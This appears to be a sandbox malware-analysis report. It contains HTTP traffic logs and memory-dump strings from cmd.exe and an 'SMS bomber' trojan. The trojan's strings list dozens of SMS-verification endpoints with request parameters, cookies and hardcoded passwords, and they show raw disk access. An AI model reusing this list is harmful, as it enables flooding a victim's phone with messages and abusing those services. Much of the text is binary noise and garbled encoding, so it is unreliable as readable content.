.l3...U...3.g.m..`.87..w.e'..-..?.D.:.t..b8uU'....^.;...-6.$..G..k......]..,......N.{...>C.&..#a2.e.....Xn<.3...c..........ez.A..t...oW...._.1T...udAM..lj.u...O....W.j..>... `..>6...=...i.;..'...'G.....<........*..}...dd..2..
<<
<<< skipped >>>
GET /?pid=66&spid=82685&date=1400765523 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; )
Host: lbdl.union.ijinshan.com
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Server: kws
Date: Thu, 22 May 2014 13:32:02 GMT
Content-Type: text/html
Content-Length: 176
Location: hXXp://lbdl.union.ijinshan.com/liebao/66_82685.pack
Connection: keep-alive
<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>kws</center>..</body>..</html>......
GET /liebao/66_82685.pack HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; )
Host: lbdl.union.ijinshan.com
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Server: kws
Date: Thu, 22 May 2014 13:32:02 GMT
Content-Type: text/html
Content-Length: 176
Location: hXXp://lbdl.union.ijinshan.com/liebao/66_0.pack
Connection: keep-alive
<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>kws</center>..</body>..</html>......
GET /liebao/66_0.pack HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; )
Host: lbdl.union.ijinshan.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: kws
Date: Thu, 22 May 2014 13:32:02 GMT
Content-Type: text/plain
Content-Length: 131
Last-Modified: Thu, 09 Jan 2014 09:33:51 GMT
Connection: keep-alive
Accept-Ranges: bytes
x.E.A.. .@...W..e0M<@..4d..Rq0..oL........f.i...cO.\......cf.....,.....a.'.KqO..S...Q...N....^...s.B.......&.....0p...q........."5.HTTP/1.1 200 OK..Server: kws..Date: Thu, 22 May 2014 13:32:02 GMT..Content-Type: text/plain..Content-Length: 131..Last-Modified: Thu, 09 Jan 2014 09:33:51 GMT..Connection: keep-alive..Accept-Ranges: bytes..x.E.A.. .@...W..e0M<@..4d..Rq0..oL........f.i...cO.\......cf.....,.....a.'.KqO..S...Q...N....^...s.B.......&.....0p...q........."5...
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
cmd.exe_520:
.text
.text
`.data
`.data
.rsrc
.rsrc
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
msvcrt.dll
msvcrt.dll
USER32.dll
USER32.dll
SetConsoleInputExeNameW
SetConsoleInputExeNameW
APerformUnaryOperation: '%c'
APerformUnaryOperation: '%c'
APerformArithmeticOperation: '%c'
APerformArithmeticOperation: '%c'
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
MPR.dll
MPR.dll
RegEnumKeyW
RegEnumKeyW
RegDeleteKeyW
RegDeleteKeyW
RegCloseKey
RegCloseKey
RegOpenKeyW
RegOpenKeyW
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
ShellExecuteExW
ShellExecuteExW
CmdBatNotification
CmdBatNotification
GetWindowsDirectoryW
GetWindowsDirectoryW
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
_pipe
_pipe
GetProcessWindowStation
GetProcessWindowStation
cmd.pdb
cmd.pdb
CMD Internal Error %s
CMD Internal Error %s
)(&&())))(&))
)(&&())))(&))
)&((&)&))&())
)&((&)&))&())
)&((&)&)&()))
)&((&)&)&()))
)(&&()))&))))
)(&&()))&))))
CMD.EXE
CMD.EXE
()|&=,;"
()|&=,;"
COPYCMD
COPYCMD
\XCOPY.EXE
\XCOPY.EXE
CMDCMDLINE
CMDCMDLINE
WKERNEL32.DLL
WKERNEL32.DLL
Software\Policies\Microsoft\Windows\System
Software\Policies\Microsoft\Windows\System
0123456789
0123456789
cmd.exe
cmd.exe
DIRCMD
DIRCMD
%d.%d.d
%d.%d.d
Ungetting: '%s'
Ungetting: '%s'
DisableCMD
DisableCMD
GeToken: (%x) '%s'
GeToken: (%x) '%s'
%s\Shell\Open\Command
%s\Shell\Open\Command
%x %c
%x %c
*** Unknown type: %x
*** Unknown type: %x
Args: `%s'
Args: `%s'
Cmd: %s Type: %x
Cmd: %s Type: %x
%s (%s) %s
%s (%s) %s
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
.exe"
.exe"
.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
%WinDir%;%WinDir%\System32\Wbem;c:\Program Files\Wireshark
%WinDir%;%WinDir%\System32\Wbem;c:\Program Files\Wireshark
CMDEXTVERSION
CMDEXTVERSION
KEYS
KEYS
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
%s %s
%s %s
(%s) %s
(%s) %s
%s %s%s
%s %s%s
&()[]{}^=;!%' ,`~
&()[]{}^=;!%' ,`~
d%sd%s
d%sd%s
-%sd%sd%sd
-%sd%sd%sd
d%sd%sd
d%sd%sd
%s=%s
%s=%s
X-X
X-X
.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS
.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS
<> -*/%()|^&=,
<> -*/%()|^&=,
\CMD.EXE
\CMD.EXE
Windows Command Processor
Windows Command Processor
5.1.2600.5512 (xpsp.080413-2111)
5.1.2600.5512 (xpsp.080413-2111)
Cmd.Exe
Cmd.Exe
Windows
Windows
Operating System
Operating System
5.1.2600.5512
5.1.2600.5512
Press any key to continue . . . %0
Press any key to continue . . . %0
operable program or batch file.
operable program or batch file.
The system cannot execute the specified program.
The system cannot execute the specified program.
and press any key when ready. %0
and press any key when ready. %0
Microsoft Windows XP [Version %1]%0
Microsoft Windows XP [Version %1]%0
a pipe operation.
a pipe operation.
KEYS is on.
KEYS is on.
KEYS is off.
KEYS is off.
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
The switch /Y may be preset in the COPYCMD environment variable.
The switch /Y may be preset in the COPYCMD environment variable.
to prompt on overwrites unless COPY command is being executed from
to prompt on overwrites unless COPY command is being executed from
Switches may be preset in the DIRCMD environment variable. Override
Switches may be preset in the DIRCMD environment variable. Override
Quits the CMD.EXE program (command interpreter) or the current batch
Quits the CMD.EXE program (command interpreter) or the current batch
CMD.EXE. If executed from outside a batch script, it
CMD.EXE. If executed from outside a batch script, it
will quit CMD.EXE
will quit CMD.EXE
ERRORLEVEL that number. If quitting CMD.EXE, sets the process
ERRORLEVEL that number. If quitting CMD.EXE, sets the process
Displays or sets a search path for executable files.
Displays or sets a search path for executable files.
Type PATH ; to clear all search-path settings and direct cmd.exe to search
Type PATH ; to clear all search-path settings and direct cmd.exe to search
Changes the cmd.exe command prompt.
Changes the cmd.exe command prompt.
$B | (pipe)
$B | (pipe)
$V Windows XP version number
$V Windows XP version number
Displays, sets, or removes cmd.exe environment variables.
Displays, sets, or removes cmd.exe environment variables.
Displays the Windows XP version.
Displays the Windows XP version.
Tells cmd.exe whether to verify that your files are written correctly to a
Tells cmd.exe whether to verify that your files are written correctly to a
Records comments (remarks) in a batch file or CONFIG.SYS.
Records comments (remarks) in a batch file or CONFIG.SYS.
Press any key to continue . . . %0
Press any key to continue . . . %0
Directs cmd.exe to a labeled line in a batch program.
Directs cmd.exe to a labeled line in a batch program.
NOT Specifies that Windows XP should carry out
NOT Specifies that Windows XP should carry out
will execute the command after the ELSE keyword if the
will execute the command after the ELSE keyword if the
I The new environment will be the original environment passed
I The new environment will be the original environment passed
to the cmd.exe and not the current environment.
to the cmd.exe and not the current environment.
SEPARATE Start 16-bit Windows program in separate memory space
SEPARATE Start 16-bit Windows program in separate memory space
SHARED Start 16-bit Windows program in shared memory space
SHARED Start 16-bit Windows program in shared memory space
If it is an internal cmd command or a batch file then
If it is an internal cmd command or a batch file then
the command processor is run with the /K switch to cmd.exe.
the command processor is run with the /K switch to cmd.exe.
If it is not an internal cmd command or batch file then
If it is not an internal cmd command or batch file then
parameters These are the parameters passed to the command/program
parameters These are the parameters passed to the command/program
under Windows XP.
under Windows XP.
Starts a new instance of the Windows XP command interpreter
Starts a new instance of the Windows XP command interpreter
CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]
CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]
/D Disable execution of AutoRun commands from registry (see below)
/D Disable execution of AutoRun commands from registry (see below)
/A Causes the output of internal commands to a pipe or file to be ANSI
/A Causes the output of internal commands to a pipe or file to be ANSI
/U Causes the output of internal commands to a pipe or file to be
/U Causes the output of internal commands to a pipe or file to be
variable var at execution time. The %var% syntax expands variables
variable var at execution time. The %var% syntax expands variables
of an executable file.
of an executable file.
If /D was NOT specified on the command line, then when CMD.EXE starts, it
If /D was NOT specified on the command line, then when CMD.EXE starts, it
either or both are present, they are executed first.
either or both are present, they are executed first.
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
can enable or disable extensions for all invocations of CMD.EXE on a
can enable or disable extensions for all invocations of CMD.EXE on a
following REG_DWORD values in the registry using REGEDT32.EXE:
following REG_DWORD values in the registry using REGEDT32.EXE:
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
particular invocation of CMD.EXE with the /V:ON or /V:OFF switch. You
particular invocation of CMD.EXE with the /V:ON or /V:OFF switch. You
can enable or disable completion for all invocations of CMD.EXE on a
can enable or disable completion for all invocations of CMD.EXE on a
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
at execution time.
at execution time.
CMD.EXE with the /F:ON or /F:OFF switch. You can enable or disable
CMD.EXE with the /F:ON or /F:OFF switch. You can enable or disable
completion for all invocations of CMD.EXE on a machine and/or user logon
completion for all invocations of CMD.EXE on a machine and/or user logon
the registry using REGEDT32.EXE:
the registry using REGEDT32.EXE:
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
Shift key with the control character will move through the list
Shift key with the control character will move through the list
&()[]{}^=;!%' ,`~
&()[]{}^=;!%' ,`~
Command Processor Extensions enabled by default. Use CMD /? for details.
Command Processor Extensions enabled by default. Use CMD /? for details.
ASSOC [.ext[=[fileType]]]
ASSOC [.ext[=[fileType]]]
.ext Specifies the file extension to associate the file type with
.ext Specifies the file extension to associate the file type with
ASSOC .pl=PerlScript
ASSOC .pl=PerlScript
FTYPE PerlScript=perl.exe %%1 %%*
FTYPE PerlScript=perl.exe %%1 %%*
script.pl 1 2 3
script.pl 1 2 3
set PATHEXT=.pl;%%PATHEXT%%
set PATHEXT=.pl;%%PATHEXT%%
The restartable option to the COPY command is not supported by
The restartable option to the COPY command is not supported by
this version of the operating system.
this version of the operating system.
The following usage of the path operator in batch-parameter
The following usage of the path operator in batch-parameter
The unicode output option to CMD.EXE is not supported by this
The unicode output option to CMD.EXE is not supported by this
version of the operating system.
version of the operating system.
If Command Extensions are enabled the DATE command supports
If Command Extensions are enabled the DATE command supports
If Command Extensions are enabled the TIME command supports
If Command Extensions are enabled the TIME command supports
If Command Extensions are enabled the PROMPT command supports
If Command Extensions are enabled the PROMPT command supports
is pretty simple and supports the following operations, in decreasing
is pretty simple and supports the following operations, in decreasing
! ~ - - unary operators
! ~ - - unary operators
* / %% - arithmetic operators
* / %% - arithmetic operators
- - arithmetic operators
- - arithmetic operators
&= ^= |= <<= >>=
&= ^= |= <<= >>=
If you use any of the logical or modulus operators, you will need to
If you use any of the logical or modulus operators, you will need to
values. If SET /A is executed from the command line outside of a
values. If SET /A is executed from the command line outside of a
assignment operator requires an environment variable name to the left of
assignment operator requires an environment variable name to the left of
the assignment operator. Numeric values are decimal numbers, unless
the assignment operator. Numeric values are decimal numbers, unless
occurrence of the remaining portion of str1.
occurrence of the remaining portion of str1.
Finally, support for delayed environment variable expansion has been
Finally, support for delayed environment variable expansion has been
added. This support is always disabled by default, but may be
added. This support is always disabled by default, but may be
enabled/disabled via the /V command line switch to CMD.EXE. See CMD /?
enabled/disabled via the /V command line switch to CMD.EXE. See CMD /?
of text is read, not when it is executed. The following example
of text is read, not when it is executed. The following example
So the actual FOR loop we are executing is:
So the actual FOR loop we are executing is:
%Í%% - expands to the current directory string.
%Í%% - expands to the current directory string.
%ÚTE%% - expands to current date using same format as DATE command.
%ÚTE%% - expands to current date using same format as DATE command.
%%CMDEXTVERSION%% - expands to the current Command Processor Extensions
%%CMDEXTVERSION%% - expands to the current Command Processor Extensions
%%CMDCMDLINE%% - expands to the original command line that invoked the
%%CMDCMDLINE%% - expands to the original command line that invoked the
If Command Extensions are enabled the SHIFT command supports
If Command Extensions are enabled the SHIFT command supports
control is passed to the statement after the label specified. You must
control is passed to the statement after the label specified. You must
%%4 %%5 ...)
%%4 %%5 ...)
CMD /? for details.
CMD /? for details.
This works because on old versions of CMD.EXE, SETLOCAL does NOT
This works because on old versions of CMD.EXE, SETLOCAL does NOT
command execution.
command execution.
non-executable files may be invoked through their file association just
non-executable files may be invoked through their file association just
by typing the name of the file as a command. (e.g. WORD.DOC would
by typing the name of the file as a command. (e.g. WORD.DOC would
launch the application associated with the .DOC file extension).
launch the application associated with the .DOC file extension).
When executing an application that is a 32-bit GUI application, CMD.EXE
When executing an application that is a 32-bit GUI application, CMD.EXE
the command prompt. This new behavior does NOT occur if executing
the command prompt. This new behavior does NOT occur if executing
When executing a command line whose first token is the string "CMD "
When executing a command line whose first token is the string "CMD "
without an extension or path qualifier, then "CMD" is replaced with
without an extension or path qualifier, then "CMD" is replaced with
the value of the COMSPEC variable. This prevents picking up CMD.EXE
the value of the COMSPEC variable. This prevents picking up CMD.EXE
When executing a command line whose first token does NOT contain an
When executing a command line whose first token does NOT contain an
extension, then CMD.EXE uses the value of the PATHEXT
extension, then CMD.EXE uses the value of the PATHEXT
.COM;.EXE;.BAT;.CMD
.COM;.EXE;.BAT;.CMD
When searching for an executable, if there is no match on any extension,
When searching for an executable, if there is no match on any extension,
If Command Extensions are enabled, and running on the Windows XP
If Command Extensions are enabled, and running on the Windows XP
forms of the FOR command are supported:
forms of the FOR command are supported:
Walks the directory tree rooted at [drive:]path, executing the FOR
Walks the directory tree rooted at [drive:]path, executing the FOR
passes the first blank separated token from each line of each file.
passes the first blank separated token from each line of each file.
is a quoted string which contains one or more keywords to specify
is a quoted string which contains one or more keywords to specify
different parsing options. The keywords are:
different parsing options. The keywords are:
be passed to the for body for each iteration.
be passed to the for body for each iteration.
where a back quoted string is executed as a
where a back quoted string is executed as a
FOR /F "eol=; tokens=2,3* delims=, " %%i in (myfile.txt) do @echo %%i %%j %%k
FOR /F "eol=; tokens=2,3* delims=, " %%i in (myfile.txt) do @echo %%i %%j %%k
would parse each line in myfile.txt, ignoring lines that begin with
would parse each line in myfile.txt, ignoring lines that begin with
a semicolon, passing the 2nd and 3rd token from each line to the for
a semicolon, passing the 2nd and 3rd token from each line to the for
line, which is passed to a child CMD.EXE and the output is captured
line, which is passed to a child CMD.EXE and the output is captured
IF CMDEXTVERSION number command
IF CMDEXTVERSION number command
The CMDEXTVERSION conditional works just like ERRORLEVEL, except it is
The CMDEXTVERSION conditional works just like ERRORLEVEL, except it is
CMDEXTVERSION conditional is never true when Command Extensions are
CMDEXTVERSION conditional is never true when Command Extensions are
%%CMDCMDLINE%% will expand into the original command line passed to
%%CMDCMDLINE%% will expand into the original command line passed to
CMD.EXE prior to any processing by CMD.EXE, provided that there is not
CMD.EXE prior to any processing by CMD.EXE, provided that there is not
already an environment variable with the name CMDCMDLINE, in which case
already an environment variable with the name CMDCMDLINE, in which case
%%CMDEXTVERSION%% will expand into a string representation of the
%%CMDEXTVERSION%% will expand into a string representation of the
current value of CMDEXTVERSION, provided that there is not already
current value of CMDEXTVERSION, provided that there is not already
an environment variable with the name CMDEXTVERSION, in which case you
an environment variable with the name CMDEXTVERSION, in which case you
under Windows XP, as command line editing is always enabled.
under Windows XP, as command line editing is always enabled.
CMD.EXE was started with the above path as the current directory.
CMD.EXE was started with the above path as the current directory.
UNC paths are not supported. Defaulting to Windows directory.
UNC paths are not supported. Defaulting to Windows directory.
CMD does not support UNC paths as current directories.
CMD does not support UNC paths as current directories.
UNC paths not supported for current directory. Using
UNC paths not supported for current directory. Using
to create temporary drive letter to support UNC current
to create temporary drive letter to support UNC current
Missing operand.
Missing operand.
Missing operator.
Missing operator.
The COMSPEC environment variable does not point to CMD.EXE.
The COMSPEC environment variable does not point to CMD.EXE.
The FAT File System only support Last Write Times
The FAT File System only support Last Write Times
of a batch script is reached, an implied ENDLOCAL is executed for any
of a batch script is reached, an implied ENDLOCAL is executed for any
application execution.
application execution.
The switch /Y may be present in the COPYCMD environment variable.
The switch /Y may be present in the COPYCMD environment variable.
to prompt on overwrites unless MOVE command is being executed from
to prompt on overwrites unless MOVE command is being executed from
when CMD.EXE started. This value either comes from the current console
when CMD.EXE started. This value either comes from the current console
The COLOR command sets ERRORLEVEL to 1 if an attempt is made to execute
The COLOR command sets ERRORLEVEL to 1 if an attempt is made to execute
ÊÖ»úºäÕ¨»ú.exe_652:
.text
.text
`.rdata
`.rdata
@.data
@.data
Hi.Chief;
Hi.Chief;
Hi.ChiefuP
Hi.ChiefuP
.rsrc
.rsrc
t$(SSh
t$(SSh
~%UVW
~%UVW
t.It It
t.It It
u$SShe
u$SShe
4g.qD
4g.qD
user32.dll
user32.dll
ntdll.dll
ntdll.dll
kernel32.dll
kernel32.dll
Setupapi.dll
Setupapi.dll
gdiplus.dll
gdiplus.dll
GdiPlus.dll
GdiPlus.dll
Kernel32.dll
Kernel32.dll
wininet.dll
wininet.dll
User32.dll
User32.dll
Ole32.dll
Ole32.dll
gdi32.dll
gdi32.dll
ole32.dll
ole32.dll
msimg32.dll
msimg32.dll
Gdi32.dll
Gdi32.dll
Gdiplus.dll
Gdiplus.dll
UxTheme.dll
UxTheme.dll
CreateWindowStationA
CreateWindowStationA
CloseWindowStation
CloseWindowStation
HttpOpenRequestA
HttpOpenRequestA
HttpSendRequestA
HttpSendRequestA
HttpQueryInfoA
HttpQueryInfoA
EnumWindows
EnumWindows
GetKeyState
GetKeyState
GdipSetStringFormatHotkeyPrefix
GdipSetStringFormatHotkeyPrefix
SetWindowsHookExA
SetWindowsHookExA
UnhookWindowsHookEx
UnhookWindowsHookEx
[I(3/#N0.bd
[I(3/#N0.bd
j"%u=w
j"%u=w
q%Xn`
q%Xn`
@|H.NI
@|H.NI
.wdd!
.wdd!
S|%u4
S|%u4
config.ini
config.ini
%S4WD
%S4WD
hg%fpM
hg%fpM
S.Ac9SR
S.Ac9SR
0.I%3s
0.I%3s
,wAe.kI
,wAe.kI
aiUy'4xu
aiUy'4xu
%c*@j
%c*@j
.eH'y
.eH'y
{&%U)
{&%U)
lj%4U
lj%4U
xe%CNs
xe%CNs
9F.cLe
9F.cLe
hJK.ZH
hJK.ZH
O.qt0
O.qt0
KERNEL32.DLL
KERNEL32.DLL
COMCTL32.dll
COMCTL32.dll
GDI32.dll
GDI32.dll
MSIMG32.dll
MSIMG32.dll
MSVCRT.dll
MSVCRT.dll
MSVFW32.dll
MSVFW32.dll
USER32.dll
USER32.dll
SkinH_EL.dll
SkinH_EL.dll
30426153
30426153
piaofh.asp
piaofh.asp
plyzxl.asp
plyzxl.asp
piaoyh.asp
piaoyh.asp
http://www.shzly.in/plwlyz/
http://www.shzly.in/plwlyz/
MSXML2.XMLHTTP
MSXML2.XMLHTTP
Microsoft.XMLHTTP
Microsoft.XMLHTTP
MSXML2.ServerXMLHTTP
MSXML2.ServerXMLHTTP
MSXML2.ServerXMLHTTP.6.0
MSXML2.ServerXMLHTTP.6.0
WinHttp.WinHttpRequest.5.1
WinHttp.WinHttpRequest.5.1
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
application/x-www-form-urlencoded
application/x-www-form-urlencoded
\\.\PhysicalDrive0
\\.\PhysicalDrive0
10/05/12
10/05/12
\.YVV
\.YVV
Ï[H
Ï[H
L <</pre><pre>Ex_DirectUI_MsgBox</pre><pre>msg_wnd</pre><pre>http://www.shzly.in/</pre><pre>http://www.pubyun.com/accounts/signup_vcode/4449056/?mobile=</pre><pre>http://</pre><pre>https://</pre><pre>http=</pre><pre>HTTP/1.1</pre><pre>Accept: image/gif, image/bmp, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*</pre><pre>Content-Type: application/x-www-form-urlencoded</pre><pre>http://www.istudy.com.cn/incpage/ARandomCode.html</pre><pre>http://mp3.easou.com/dg.e?l=2ld.1&esid=xf5aHaRUMZo&wver=c</pre><pre>&song=花ç«-ä¸Â当&esid=xf5aHaRUMZo&id=1514183&submit=通过çŸä¿¡å…Â费点æ’</pre><pre>http://wap.mail.163.com/reg.s?regtype=mobile</pre><pre>&password=19951221&password2=19951221&action=æÂÂ交注册信æÂ¯</pre><pre>http://i.house.sina.com.cn/index.php</pre><pre>&password=19951221&province=50&city=500100&auth_code=·òÏà&nickname=159xxxx0043&type=mobile&inviteid=&ctrl=register&act=create_mobile</pre><pre>loginname=</pre><pre>http://www.m3.cc/url.php?class=check</pre><pre>http://www.gogo.com/js/regAjax.ashx</pre><pre>http://passport.soufun.com/ajax/ajaxmobilecode_v3.aspx</pre><pre>http://www.chinaface.com/aj/user/mobileregister</pre><pre>http://reg.jiayuan.com/libs/xajax/reguser.server.php?processUserMobile</pre><pre>&xajaxr=1341738718781</pre><pre>xajax=processUserMobile&xajaxargs[]=<xjxquery><q>mobile=</q></xjxquery></pre><pre>http://reg.jiayuan.com/libs/xajax/reguser.server.php?processSendOrUpdateMessage</pre><pre>&xajaxargs[]=mobile&xajaxr=1341738718874</pre><pre>xajax=processSendOrUpdateMessage&xajaxargs[]=<xjxquery><q>mobile=</q></xjxquery></pre><pre>http://china.alibaba.com/member/sendIdentityCodeByMobile.htm?callback=jQuery17209392130269428131_1341739007515&mobile=</pre><pre>http://www.dianping.com/ajax/json/account/reg/mobile/send</pre><pre>http://reg.ztgame.com/registe/mobilePhoneRegister</pre><pre>http://user.qunar.com/ajax/validator.jsp</pre><pre>http://saa.auto.sohu.com/reg/mobileReg.at</pre><pre>&vuser.nickName=952898714&vuser.pwd=nizaina&repasswd=nizaina&vuser.rStatus=1&vuser.rBrandId=218&vuser.rModelId=1947&validate=bdxh</pre><pre>vuser.userMobile=</pre><pre>http://www.keepc.com/voip/registerForMobileForCode.act</pre><pre>http://www.skywldh.com/registerForMobileForCode.act</pre><pre>http://www.uwewe.com/get/SendMessage.aspx?phone=</pre><pre>http://www.139talk.com/user/regnum.html</pre><pre>&type=1&key=btdufou6jv7vc3ed5142m56hu6</pre><pre>http://newreg.eesina.net//servlet/ValidatePhone?time=</pre><pre>http://newreg.eesina.net//servlet/RandomServlet?time=</pre><pre>http://chinatelecom.zc.qq.com/cgi-bin/send_sms</pre><pre>http://login.m18.com/Service/ContactService.ashx?Method=RegisterByPhoneSendCheckCode&MobilePhone=</pre><pre>http://club.service.autohome.com.cn/Ashx/CreateMobileCode.ashx</pre><pre>http://passport.eastmoney.com/chkphone.aspx</pre><pre>http://service.che168.com/Ashx/CreateMobileCode.ashx</pre><pre>http://register.sdo.com/gaea/SendPhoneMsg.ashx?page=REG&mobile=</pre><pre>http://reg.email.163.com/mailregAll/sendvcode.do?</pre><pre>&domain=163.com&mobile=</pre><pre>http://passport.wanmei.com/NoteAction.do?method=sendCode</pre><pre>http://www.aicall800.com/freecall.php</pre><pre>&password=19951221&seccode=wryk&PhoneNumber=</pre><pre>http://member1.taobao.com/member/new_set_cell_phone.do</pre><pre>paras=MTAyOTk5NjgwOQ==&css_style=&userNumId=1029996809&mobile_area=1&mobile=</pre><pre>http://www.baixing.com/ajax/auth/sendCode/?mobile=</pre><pre>http://passport.17u.cn/Member/RegisterHandler.ashx?action=phone&phone=</pre><pre>http://u.uzai.com/SendCheckCode</pre><pre>http://user.qunar.com/user/confirmContact.jsp?ret=/userinfo/index.jsp</pre><pre>http://www.dreams-travel.com/user/reg/reg_action.asp</pre><pre>&user_tel=&user_name=²ÐÆÆ¶ø&user_sfz=0&country=ChinaÖйú&province=Ê¡(ÖÝ)&city=±±¾©&username=952898714@qq.com&user_password=19951221&user_password1=19951221&zcxy=1&dzzk=1&yzfs=tel&imageField.x=28&imageField.y=14</pre><pre>user_email=952898714@qq.com&zc_tel=</pre><pre>http://www.mangocity.com/mbrweb/registerAjax/randomNumber.action</pre><pre>http://yuyue.shdc.org.cn/User/ajaxSendConfirmCode.aspx</pre><pre>http://www.tianpin.com/user/send_telephone_code</pre><pre>http://yantubbs.com/register.php?nowtime=1352018399000&verify=f40830d2</pre><pre>http://passport.q.com.cn/register/index/sendphonecode/</pre><pre>&_=1352018752859</pre><pre>http://gwpassport.woniu.com/v2/sendsms?jsoncallback=jQuery17204481290172278189_1352018741044&mobile=</pre><pre>http://service.cq.10086.cn/app?service=ajaxDirect/1/newLogin.login/newLogin.login/javascript/&pagename=newLogin.login&eventname=sendSMSlogin&&SERIAL_NUMBER=</pre><pre>http://bbs.zhue.com.cn/ajax.php?infloat=register&handlekey=register&action=getverifycode1&mobile=</pre><pre>http://www.frisochina.com/ajax/GetPhoneCode.aspx?mobile=</pre><pre>http://mail.sina.com.cn/cgi-bin/phonecode.php</pre><pre>http://www.51taonan.com/?page=join&handler=ajax&action=send_reg_mobile_vcode&page_key=7ef0c64ccfeccd5cdda1306c3b769e1b&mobile_number=</pre><pre>http://reg.99114.com/Ajax/Secrity.ashx?action=passwordprotect&type=1&phone=</pre><pre>http://my.checkoo.com/register.jsp?flow=smscode&mobile=</pre><pre>http://as.baidu.com/a/msg?act=sendtomobile&f=home_2015_0&mobile=</pre><pre>http://passport.kongzhong.com/x/call/plaincall/regjs.reSendVcode.dwr</pre><pre>c0-param1=string:1a1780ed-691b-466e-965d-532ab3b506eac0-param2=boolean:falsec0-param3=boolean:falsebatchId=1</pre><pre>callCount=1page=/register/reg_succ_phone.jsphttpSessionId=B138818BA9DBAD8D7A3A6220B45068F5scriptSessionId=53F4C2FEA4D843099C12C210057FA3DC486c0-scriptName=regjsc0-methodName=reSendVcodec0-id=0c0-param0=string:</pre><pre>http://www.cqsq.com/register.php</pre><pre>http://i.360.cn/smsApi/sendsmscode?account=</pre><pre>http://member.tiancity.com/handler/GetPhoneRegAuthCodeHandler.ashx?a=0.9170439269767781&userid=</pre><pre>http://www.kunlun.com/index.php?act=ajax.checkUsername&user_name=</pre><pre>&smsvcode=输入手机获å–的验è¯Âç Â&_=1352977641984</pre><pre>http://passport.kongzhong.com/acc.do?m=sendPhoneVcodeFast&callback=jQuery17204441263292015887_1352977631016&phone=</pre><pre>http://www.91wan.com/huodong/bind_phone/get_code.php</pre><pre>http://my.xoyo.com/register/NewIsExist/?uid=</pre><pre>http://user.51wan.com/reg_index_sendphone_0.html</pre><pre>http://www.tiboo.cn/register.php?nowtime=1352981025093</pre><pre>http://user.syyx.com/ajax/users/checkusername.aspx?u=</pre><pre>http://core.u7u7.com/Inf/Register.aspx?jsoncallback=jsonp1352981442421&username=</pre><pre>&_=1352982551343 HTTP/1.1Accept: */*Referer: http://register.sdo.com/gaea/phone_default.aspx?from=89&zone=home_embed&NotifyId=dnEnv1Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; QQDownload 734; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)Host: authleqr.sdo.comConnection: Keep-AliveCookie: sdo_beacon_id=113.205.173.252.1350557866205.7; SNDA_ADRefererSystem_UserTicket=a2b6c754-ff5b-4ac9-b226-9c47dceedf1e; SNDA_ADRefererSystem_ADID=; SNDA_ADRefererSystem_RefererUrl=http://register.sdo.com/gaea/phone_default.aspx?from=89&zone=home_embed&NotifyId=dnEnv1; SNDA_ADRefererSystem_RefererTime=2012-11-15 20:20:53; SNDA_ADRefererSystem_InSiteUrl=http://adrs.sdo.com/ADRefererSystem/prereg.html; 